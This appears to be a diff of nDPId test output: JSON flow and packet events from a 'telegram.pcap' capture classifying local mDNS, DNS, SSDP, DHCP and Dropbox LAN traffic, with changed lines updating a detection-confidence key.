00724{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"telegram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1588779597258,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":253,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":253,"pkt_l4_len":199,"thread_ts_msec":1588779597258,"pkt":"MzMAAAD7jP5XIzfkht1gD8IfAMcR\/\/6AAAAAAAAABLoJGngX4xj\/AgAAAAAAAAAAAAAAAAD7FOkU6QDHLvQAAAAAAAUAAAABAAEPX2NvbXBhbmlvbi1saW5rBF90Y3AFbG9jYWwAAAyAAQhfaG9tZWtpdMAcAAyAAQhfYWlycGxhecAcAAyAAQVfcmFvcMAcAAyAARxpVHVuZXNfQ3RybF80QUJCMzlBNDFFRUZERUIzBV9kYWNwwBwA\/4ABwFYAIQABAAAAeAAXAAAAAMcjDkdhYnJpZWxlcy1pUGFkwCEAACkFoAAAEZQAEgAEAA4A2q7+VyM35Iz+VyM35A=="} 
00793{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"telegram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1588779597258,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":308,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":308,"pkt_l4_len":274,"thread_ts_msec":1588779597258,"pkt":"AQBeAAD7jP5XIzfkCABFAAEmpacAAP8RcjDAqAFL4AAA+xTpFOkBEl+aAACEAAAAAAMAAAADCV9zZXJ2aWNlcwdfZG5zLXNkBF91ZHAFbG9jYWwAAAwAAQAAEZQADQVfZGFjcARfdGNwwCMBOAExATMBRQE3ATEBOAE3AUEBMQE5ATABQQFCATQBMAEwATABMAEwATABMAEwATABMAEwATABMAEwATgBRQFGA2lwNgRhcnBhAAAMgAEAAAB4ABEOR2FicmllbGVzLWlQYWTAIwI3NQExAzE2OAMxOTIHaW4tYWRkcsCFAAyAAQAAAHgAAsCVwEEAL4ABAAAAeAAGwEEAAgAIwKYAL4ABAAAAeAAGwKYAAgAIAAApBaAAABGUABIABAAOANqu\/lcjN+SM\/lcjN+Q="} 00824{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"telegram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1588779597258,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":328,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":328,"pkt_l4_len":274,"thread_ts_msec":1588779597258,"pkt":"MzMAAAD7jP5XIzfkht1gD8IfARIR\/\/6AAAAAAAAABLoJGngX4xj\/AgAAAAAAAAAAAAAAAAD7FOkU6QESmwYAAIQAAAAAAwAAAAMJX3NlcnZpY2VzB19kbnMtc2QEX3VkcAVsb2NhbAAADAABAAARlAANBV9kYWNwBF90Y3DAIwE4ATEBMwFFATcBMQE4ATcBQQExATkBMAFBAUIBNAEwATABMAEwATABMAEwATABMAEwATABMAEwATABOAFFAUYDaXA2BGFycGEAAAyAAQAAAHgAEQ5HYWJyaWVsZXMtaVBhZMAjAjc1ATEDMTY4AzE5Mgdpbi1hZGRywIUADIABAAAAeAACwJXAQQAvgAEAAAB4AAbAQQACAAjApgAvgAEAAAB4AAbApgACAAgAACkFoAAAEZQAEgAEAA4A2q7+VyM35Iz+VyM35A=="} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"telegram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779597291,"flow_last_seen":1588779597291,"flow_idle_time":200000,"flow_min_l4_payload_len":278,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":278,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1588779597291,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.75","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00810{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"telegram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1588779597291,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":320,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":320,"pkt_l4_len":286,"thread_ts_msec":1588779597291,"pkt":"jP5XIzfkKDc3AG3ICABFAAEy\/KUAAP8ROizAqAFNwKgBSxTpFOkBHhkOAACEAAAAAAEAAAAED19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEAABGUABANTHVjYeKAmXMgaU1hY8AMwDIAIYABAAAAeAATAAAAAMAFCkx1Y2FzLWlNYWPAIcAyABCAAQAAEZQAWBZycEJBPTM5OjJBOjg4OkFDOjQxOkFCCnJwVnI9MTUyLjERcnBIST1mOWM0NmM2ZGQwN2QRcnBITj0zYzVkYzVjZTk1NzgRcnBIQT04Y2E4Y2I3MzFjMWMNTHVjYeKAmXMgaU1hYwxfZGV2aWNlLWluZm\/AHAAQAAEAABGUABoObW9kZWw9aU1hYzExLDMKb3N4dmVycz0xN8BUAAGAAQAAAHgABMCoAU0="} -00690{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"telegram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779597291,"flow_last_seen":1588779597291,"flow_idle_time":200000,"flow_min_l4_payload_len":278,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":278,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1588779597291,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.75","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}} +00690{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"telegram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779597291,"flow_last_seen":1588779597291,"flow_idle_time":200000,"flow_min_l4_payload_len":278,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":278,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1588779597291,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.75","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}} 00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"telegram.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1588779598465,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1588779598465,"pkt":"AQBef\/\/6wJrQLWJ0CABFAACa8TAAAAERFkvAqAE17\/\/\/+tQiB2wAhkPyTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"telegram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779600828,"flow_last_seen":1588779600828,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1588779600828,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61631,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"telegram.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1588779600828,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1588779600828,"pkt":"EBMx8Tl2KDc3AG3ICABFAABGiX4AAP8RronAqAFNwKgBAfC\/ADUAMkhio9MBAAABAAAAAAAABWU3MDQ3A2UxMgpha2FtYWllZGdlA25ldAAAAQAB"} -00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"telegram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779600828,"flow_last_seen":1588779600828,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1588779600828,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61631,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e7047.e12.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"telegram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779600828,"flow_last_seen":1588779600828,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1588779600828,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61631,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e7047.e12.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00809{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"telegram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1588779600838,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":320,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":320,"pkt_l4_len":286,"thread_ts_msec":1588779600838,"pkt":"jP5XIzfkKDc3AG3ICABFAAEyb04AAP8Rx4PAqAFNwKgBSxTpFOkBHhkOAACEAAAAAAEAAAAED19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEAABGUABANTHVjYeKAmXMgaU1hY8AMwDIAIYABAAAAeAATAAAAAMAFCkx1Y2FzLWlNYWPAIcAyABCAAQAAEZQAWBZycEJBPTM5OjJBOjg4OkFDOjQxOkFCCnJwVnI9MTUyLjERcnBIST1mOWM0NmM2ZGQwN2QRcnBITj0zYzVkYzVjZTk1NzgRcnBIQT04Y2E4Y2I3MzFjMWMNTHVjYeKAmXMgaU1hYwxfZGV2aWNlLWluZm\/AHAAQAAEAABGUABoObW9kZWw9aU1hYzExLDMKb3N4dmVycz0xN8BUAAGAAQAAAHgABMCoAU0="} 
00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"telegram.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1588779600842,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1588779600842,"pkt":"KDc3AG3IEBMx8Tl2CABFAABWE2lAADkRqo\/AqAEBwKgBTQA18L8AQgAAo9OBgAABAAEAAAAABWU3MDQ3A2UxMgpha2FtYWllZGdlA25ldAAAAQABwAwAAQABAAAAFAAEXHr3XA=="} -00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"telegram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779600828,"flow_last_seen":1588779600842,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1588779600842,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61631,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e7047.e12.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.122.247.92"}} +00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"telegram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779600828,"flow_last_seen":1588779600842,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1588779600842,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61631,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"e7047.e12.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.122.247.92"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"telegram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779601222,"flow_last_seen":1588779601222,"flow_idle_time":200000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1588779601222,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01069{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"telegram.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1588779601222,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":506,"pkt_l4_len":472,"thread_ts_msec":1588779601222,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAAHsBFEAAEARsrvAqAFN\/\/\/\/\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"} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"telegram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779601222,"flow_last_seen":1588779601222,"flow_idle_time":200000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1588779601222,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"telegram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779601222,"flow_last_seen":1588779601222,"flow_idle_time":200000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1588779601222,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"telegram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779601223,"flow_last_seen":1588779601223,"flow_idle_time":200000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1588779601223,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01066{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"telegram.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1588779601223,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":506,"pkt_l4_len":472,"thread_ts_msec":1588779601223,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAAHskFkAAEARZAvAqAFNwKgB\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"} 
-00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"telegram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779601223,"flow_last_seen":1588779601223,"flow_idle_time":200000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1588779601223,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"telegram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779601223,"flow_last_seen":1588779601223,"flow_idle_time":200000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1588779601223,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
00822{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"telegram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1588779601447,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"thread_ts_msec":1588779601447,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWrCABFAAEzGJZAAEARYHvAqAAB\/\/\/\/\/wBEAEMBHwAAAQEGAM98X0EAAIAAAAAAAAAAAAAAAAAAAAAAANgNF9ZVqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwIBAwwJVEwtU0cxMTZFPAlUTC1TRzExNkU9BwHYDRfWVav\/"} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1588779603292,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":181,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":181,"pkt_l4_len":147,"thread_ts_msec":1588779603292,"pkt":"AQBeAAD7wJrQLWJ0CABFAACnQj4AAP8R1i7AqAE14AAA+xTpFOkAk34YAAAAAAAFAAAAAAABCF9ob21la2l0BF90Y3AFbG9jYWwAAAyAAQ9fY29tcGFuaW9uLWxpbmvAFQAMgAEFX3Jhb3DAFQAMgAEIX2FpcnBsYXnAFQAMgAEMX3NsZWVwLXByb3h5BF91ZHDAGgAMgAEAACkFoAAAEZQAEgAEAA4AMeKa0C1idMCa0C1idA=="} 
-00688{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779596464,"flow_last_seen":1588779603292,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":92,"midstream":0,"thread_ts_msec":1588779603292,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}} +00688{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779596464,"flow_last_seen":1588779603292,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":92,"midstream":0,"thread_ts_msec":1588779603292,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"telegram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779603292,"flow_last_seen":1588779603292,"flow_idle_time":200000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1588779603292,"l3_proto":"ip6","src_ip":"fe80::18a0:a412:8935:c01b","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00653{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"telegram.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1588779603292,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":201,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":201,"pkt_l4_len":147,"thread_ts_msec":1588779603292,"pkt":"MzMAAAD7wJrQLWJ0ht1gBqDxAJMR\/\/6AAAAAAAAAGKCkEok1wBv\/AgAAAAAAAAAAAAAAAAD7FOkU6QCTHG8AAAAAAAUAAAAAAAEIX2hvbWVraXQEX3RjcAVsb2NhbAAADIABD19jb21wYW5pb24tbGlua8AVAAyAAQVfcmFvcMAVAAyAAQhfYWlycGxhecAVAAyAAQxfc2xlZXAtcHJveHkEX3VkcMAaAAyAAQAAKQWgAAARlAASAAQADgAx4prQLWJ0wJrQLWJ0"} -00693{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"telegram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779603292,"flow_last_seen":1588779603292,"flow_idle_time":200000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1588779603292,"l3_proto":"ip6","src_ip":"fe80::18a0:a412:8935:c01b","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}} +00693{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"telegram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779603292,"flow_last_seen":1588779603292,"flow_idle_time":200000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"thread_ts_msec":1588779603292,"l3_proto":"ip6","src_ip":"fe80::18a0:a412:8935:c01b","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"telegram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779603320,"flow_last_seen":1588779603320,"flow_idle_time":200000,"flow_min_l4_payload_len":278,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":278,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1588779603320,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.53","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00810{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"telegram.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1588779603320,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":320,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":320,"pkt_l4_len":286,"thread_ts_msec":1588779603320,"pkt":"wJrQLWJ0KDc3AG3ICABFAAEyUGUAAP8R5oLAqAFNwKgBNRTpFOkBHhkkAACEAAAAAAEAAAAED19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEAABGUABANTHVjYeKAmXMgaU1hY8AMwDIAIYABAAAAeAATAAAAAMAFCkx1Y2FzLWlNYWPAIcAyABCAAQAAEZQAWBZycEJBPTM5OjJBOjg4OkFDOjQxOkFCCnJwVnI9MTUyLjERcnBIST1mOWM0NmM2ZGQwN2QRcnBITj0zYzVkYzVjZTk1NzgRcnBIQT04Y2E4Y2I3MzFjMWMNTHVjYeKAmXMgaU1hYwxfZGV2aWNlLWluZm\/AHAAQAAEAABGUABoObW9kZWw9aU1hYzExLDMKb3N4dmVycz0xN8BUAAGAAQAAAHgABMCoAU0="} 
-00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"telegram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779603320,"flow_last_seen":1588779603320,"flow_idle_time":200000,"flow_min_l4_payload_len":278,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":278,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1588779603320,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.53","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}} +00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"telegram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779603320,"flow_last_seen":1588779603320,"flow_idle_time":200000,"flow_min_l4_payload_len":278,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":278,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1588779603320,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.53","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}} 
